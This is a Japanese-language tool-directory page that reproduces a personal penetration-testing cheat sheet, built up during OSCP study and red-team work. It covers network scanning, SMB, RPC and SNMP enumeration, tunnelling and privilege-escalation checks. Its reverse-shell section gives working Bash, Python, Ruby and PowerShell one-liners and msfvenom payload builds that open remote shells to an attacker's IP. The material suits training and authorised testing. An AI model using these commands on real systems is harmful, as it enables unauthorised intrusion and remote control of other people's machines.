Skip to content
KitploitKITPLOIT
ツールエクスプロイトブログ
Log in
提出
ツールエクスプロイトブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
Pentest-Cheat-Sheet — 世の中にはたくさんのチートシートがあるけれど、これは私のものだ。 | Kitploit
ツール/GitHubGitHub/d0n601/pentest-cheat-sheet
パスワードクラッキング特権昇格偵察エクスプロイト横移動ウェブアプリケーション悪用ペネトレーションテスト学習と教育レッドチーミング厳選リソース
GitHubd0n601/pentest-cheat-sheet

Pentest-Cheat-Sheet

389181年前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

世の中にはたくさんのチートシートがあるけれど、これは私のものだ。

リポジトリを見る

ペンテスト チートシート

世の中には多くのチートシートがあるが、これは私のものだ。現在進行形のもので、頻繁に、時々更新されるラフドラフトのようなものだ。OSCP の勉強中に作り始めたが、今ではレッドチーマーとして必要な、より実践的な内容へと進化している。新しい追加事項は試験ではおそらく役に立たないだろうし、禁止されているツールさえ含まれるかもしれない。

偵察

非常に不完全...

Linux ローカル

find / -name flag.txt はファイル名でファイルを探す。

grep -R "flag40" / -s -n はルートディレクトリからファイル内の文字列を再帰的に検索し、エラー出力なしで漁る。

Windows ローカル

dir /s flag.txt はカレントディレクトリとサブディレクトリ内の flag.txt という名前のファイルを探す。

Active Directory

便利なツール -> wadcoms.github.io

ポートスキャン

nmap

nmap -sn 10.11.1.0/24 ホストを探すためのネットワークスイープ。

  • nmap -sn 10.11.1.0/24 -oG - | awk '/Up$/{print $2}' > list_ips.txt 起動している IP をネットワークからスイープし、IP アドレスをリストに保存する。

nmap -A 10.10.10.10 OS とサービス検出付きで一般的な TCP ポートをクイックスキャンする。

nmap -A 10.10.10.10 -p- OS とサービス検出付きで全 TCP ポートをスキャンする。

nmap -A -sU 10.10.10.10 OS とサービス検出付きで全 UDP ポートをスキャンする。

sudo nmap -O -A -sV 10.10.10.10 一般的な TCP ポートをすべてスキャンし、OS をフィンガープリントし、スクリプトを実行してバナーを取得する。

Proxychains 経由

proxychains nmap -Pn -sT 10.10.10.10 -v ICMP/UDP スキャンは機能しないため。

Netcat

-w フラグはタイムアウトを秒単位で指定し、-z フラグはゼロデータを送信する(スキャン用)。

nc -nvv -w 1 -z 10.11.1.220 3388-3390 ポート 3388〜3390 の TCP スキャン。

nc -nv -u -z -w 1 10.11.1.115 160-162 ポート 160〜162 の UDP スキャン。

ディレクトリ列挙

Gobuster

  • ディレクトリバスティングの例 gobuster dir -u http://10.1.1.27 -w /usr/share/wordlists/dirb/big.txt。

私も dirsearch が好きだ。

Kali で便利なワードリスト

kali@kali:~/Tools/dirsearch$ ls /usr/share/wordlists
dirb  dirbuster  fasttrack.txt  fern-wifi  metasploit  nmap.lst  rockyou.txt  rockyou.txt.gz  wfuzz
kali@kali:~/Tools/dirsearch$ ls /usr/share/seclists
Discovery  Fuzzing  IOCs  Miscellaneous  Passwords  Pattern-Matching  Payloads  README.md  Usernames  Web-Shells
kali@kali:~/Tools/dirsearch$ 

python3 dirsearch.py -u http://10.11.1.44 -t 100 -e php,gzip,tar,txt -w /usr/share/wordlists/dirb/big.txt -r dirb の big.txt を使ったディレクトリ列挙。コピペして IP/URL と拡張子を変更するだけ。

python3 dirsearch.py -u http://10.11.1.44 -t 100 -e php,gzip,tar,txt -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -r dirbuster のディレクトリリストを使ったディレクトリ列挙。コピペして IP/URL と拡張子を変更するだけ。

python3 dirsearch.py -u http://10.11.1.71 -t 100 -e cgi -w /usr/share/seclists/Discovery/Web-Content/CGIs.txt -r CGI をブルートフォースする。

共有フォルダの列挙(rsync)

rsync モジュールは基本的にディレクトリ共有です。これらのモジュールは必要に応じてパスワードで保護できます。このオプションは利用可能なモジュールを一覧表示し、必要に応じて、モジュールへのアクセスにパスワードが必要かどうかを判定します**:**:。

nmap -sV --script "rsync-list-modules" -p <PORT> <IP>

SMB 列挙

手動

smbclient -L 10.11.1.146 利用可能な共有を一覧表示する。

smbclient //10.11.1.146/IPC$ その共有にログインする。うまくいかない場合は sudo を試す... sudo smbclient //10.11.1.146/IPC$

自動

enum4linux 10.11.1.146 -a -o enum4linux を使用して SMB 共有の列挙を自動化する。

RPC 列挙

Null ログオンで接続できる場合 -> rpcclient -U '' -N forest.htb。

rpcclient $> querydomaininfo
command not found: querydomaininfo
rpcclient $> querydominfo
Domain:         HTB
Server:
Comment:
Total Users:    105
Total Groups:   0
Total Aliases:  0
Sequence No:    1
Force Logoff:   -1
Domain Server State:    0x1
Server Role:    ROLE_DOMAIN_PDC
Unknown 3:      0x1
rpcclient $> enumdomusers
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[$331000-VK4ADACQNUCA] rid:[0x463]
user:[SM_2c8eef0a09b545acb] rid:[0x464]
user:[SM_ca8c2ed5bdab4dc9b] rid:[0x465]
user:[SM_75a538d3025e4db9a] rid:[0x466]
user:[SM_681f53d4942840e18] rid:[0x467]
user:[SM_1b41c9286325456bb] rid:[0x468]
user:[SM_9b69f1b9d2cc45549] rid:[0x469]
user:[SM_7c96b981967141ebb] rid:[0x46a]
user:[SM_c75ee099d0a64c91b] rid:[0x46b]
user:[SM_1ffab36a2f5f479cb] rid:[0x46c]
user:[HealthMailboxc3d7722] rid:[0x46e]
user:[HealthMailboxfc9daad] rid:[0x46f]
user:[HealthMailboxc0a90c9] rid:[0x470]
user:[HealthMailbox670628e] rid:[0x471]
user:[HealthMailbox968e74d] rid:[0x472]
user:[HealthMailbox6ded678] rid:[0x473]
user:[HealthMailbox83d6781] rid:[0x474]
user:[HealthMailboxfd87238] rid:[0x475]
user:[HealthMailboxb01ac64] rid:[0x476]
user:[HealthMailbox7108a4e] rid:[0x477]
user:[HealthMailbox0659cc1] rid:[0x478]
user:[sebastien] rid:[0x479]
user:[lucinda] rid:[0x47a]
user:[svc-alfresco] rid:[0x47b]
user:[andy] rid:[0x47e]
user:[mark] rid:[0x47f]
user:[santi] rid:[0x480]
rpcclient $> 

良い記事 もう一つの良い記事

NFS

showmount -e 10.10.10.10 利用可能なマウントを確認する。

mount -t nfs 10.10.10.10:/ /tmp -o nolock ルートまたは任意のフォルダをマウントする。

SNMP 列挙

onesixtyone -c community -i ips ターゲットネットワークをスキャンして SNMP サーバを特定する。community と ips はリスト。community = (public, private, manager)。

snmp-check 10.11.1.227 以下のすべてを実行するが、より良く、見やすく整形してくれる :)

snmpwalk -c public -v1 -t 10 10.11.1.115 MIB ツリー全体を列挙する。

snmpwalk -c public -v1 10.11.1.14 1.3.6.1.4.1.77.1.2.25 Windows ユーザーを列挙する。

snmpwalk -c public -v1 10.11.1.73 1.3.6.1.2.1.25.4.2.1.2 Windows で実行中のプロセスを列挙する。

snmpwalk -c public -v1 10.11.1.14 1.3.6.1.2.1.6.13.1.3 開いている TCP ポートを列挙する。

snmpwalk -c public -v1 10.11.1.50 1.3.6.1.2.1.25.6.3.1.2 インストール済みソフトウェアを列挙する。

リバースシェル

Bash

/bin/bash -i >& /dev/tcp/192.168.119.137/1337 0>&1

Python

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);

Ruby

ruby -rsocket -e'f=TCPSocket.open("10.10.14.3",8081).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

PowerShell

powershell -c "$client = New-Object System.Net.Sockets.TCPClient('192.168.119.137',1337);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

リスナー

Netat

nc -lvp 4444 Netcat でポート 4444 にリバースシェルを待ち受ける(キャッチする)。

TTY シェルをスポーンする

python -c 'import pty; pty.spawn("/bin/bash")' または python3 -c 'import pty; pty.spawn("/bin/bash")'

MSFVenom

ASP

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.119.137 LPORT=4444 -f asp > shell.asp

WAR

msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.119.137 LPORT=4444 -f war > shell.war

JSP

これはクレイジーな Web シェルの代わりに Cold Fusion でも機能する。 msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.119.137 LPORT=4444 -f raw > shell.jsp

Linux バイナリ

msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.49.133 LPORT=443 -f elf > shell.elf

シェルコード

msfvenom -p windows/shell_reverse_tcp LHOST=10.11.0.4 LPORT=443 EXITFUNC=thread -f c –e x86/shikata_ga_nai -b "\x00\x0a\x0d\x25\x26\x2b\3d" Windows シェル用。バッドキャラクターをエンコードする。

msfvenom -p linux/x86/shell_reverse_tcp LHOST=10.11.0.4 LPORT=443 -b "\x00\x20" -f py -v shellcode Linux 用。python 出力をオプションとして使用。

トンネリングとピボット

ローカルポートフォワーディング。以下の例では、localhost でのみ利用可能な pandora.htb 上のサービスにアクセスできる。 ssh -L 127.0.0.1:9050:pandora.htb:80 [email protected]

ダイナミックポートフォワーディング。 ssh -D 9050 [email protected]

RDP チート

rdesktop が Certificate recieved from server is NOT trusted by this sytem,... というエラーを出して失敗する場合は、xfreerdp を使う。

proxychains4 xfreerdp /u:dev /v:10.0.0.5:3389

権限昇格

Linux

sudo -l を実行し、NOPASSWD: ALL でユーザーとしてスクリプトを実行できるなど、何か興味深いものがないか確認する。

ディストリビューションのバージョン

  • cat /etc/issue

カーネルのバージョンとアーキテクチャ

  • uname -r
  • arch

書き込み可能なディレクトリを探す

find / -writable -type d 2>/dev/null

SUID バイナリを表示する

find / -perm -u=s -type f 2>/dev/null

実行中のプロセス

ps axu

リッスン中のサービスを確認する

ss -lnpt

Cron ジョブ

ls -la /etc/cron.d cron.d に既に存在する cron ジョブを表示する。

Windows

ツールをダウンロード